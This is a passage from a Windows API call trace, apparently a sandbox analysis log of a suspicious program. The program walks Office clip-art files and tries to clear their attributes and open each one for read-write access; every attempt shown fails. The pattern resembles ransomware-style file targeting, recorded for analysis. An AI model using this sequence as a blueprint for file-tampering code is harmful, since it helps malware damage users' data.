returned 1 [0135.679] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.679] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF", dwFileAttributes=0x80) returned 0 [0135.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199661.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199661.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.680] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.680] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF", dwFileAttributes=0x80) returned 0 [0135.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199727.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.680] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.680] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF", dwFileAttributes=0x80) returned 0 [0135.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199755.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.681] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.681] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.681] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF", dwFileAttributes=0x80) returned 0 [0135.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199805.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.682] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF", dwFileAttributes=0x80) returned 0 [0135.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205462.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0205462.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.683] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.683] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF", dwFileAttributes=0x80) returned 0 [0135.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205466.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0205466.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.684] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.684] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF", dwFileAttributes=0x80) returned 0 [0135.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0205582.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0205582.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.684] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.684] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.684] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF", dwFileAttributes=0x80) returned 0 [0135.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0211949.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.685] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.685] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.685] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF", dwFileAttributes=0x80) returned 0 [0135.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212219.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.686] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.686] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF", dwFileAttributes=0x80) returned 0 [0135.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212661.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.686] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.686] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF", dwFileAttributes=0x80) returned 0 [0135.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212701.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212701.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.687] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.687] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF", dwFileAttributes=0x80) returned 0 [0135.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212957.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212957.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.687] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.687] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.687] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV", dwFileAttributes=0x80) returned 0 [0135.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0214098.WAV" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0214098.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.688] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.688] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.688] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.689] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF", dwFileAttributes=0x80) returned 0 [0135.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0215086.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0215086.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.689] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.689] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.689] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF", dwFileAttributes=0x80) returned 0 [0135.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216516.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.690] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.690] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.690] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF", dwFileAttributes=0x80) returned 0 [0135.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216588.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216588.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.690] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.690] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.690] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF", dwFileAttributes=0x80) returned 0 [0135.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216724.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216724.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.694] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.694] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.695] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.695] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF", dwFileAttributes=0x80) returned 0 [0135.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0216858.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0216858.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.695] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.695] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.695] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF", dwFileAttributes=0x80) returned 0 [0135.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0217698.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0217698.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.696] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.696] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF", dwFileAttributes=0x80) returned 0 [0135.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0221903.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0221903.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.696] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.696] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.697] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF", dwFileAttributes=0x80) returned 0 [0135.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222015.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222015.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.697] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.697] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.697] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF", dwFileAttributes=0x80) returned 0 [0135.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222017.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222017.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.698] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.698] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF", dwFileAttributes=0x80) returned 0 [0135.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222019.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.698] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.698] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF", dwFileAttributes=0x80) returned 0 [0135.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222021.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.699] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.699] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF", dwFileAttributes=0x80) returned 0 [0135.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0229385.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.700] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.700] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.700] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF", dwFileAttributes=0x80) returned 0 [0135.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229389.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0229389.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.700] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.701] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.701] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF", dwFileAttributes=0x80) returned 0 [0135.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0230876.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0230876.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.701] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.701] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.701] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF", dwFileAttributes=0x80) returned 0 [0135.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233018.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0233018.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.702] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.702] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF", dwFileAttributes=0x80) returned 0 [0135.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233070.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0233070.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.703] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.703] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.703] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.703] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF", dwFileAttributes=0x80) returned 0 [0135.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0233312.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0233312.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.703] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.703] VirtualFree 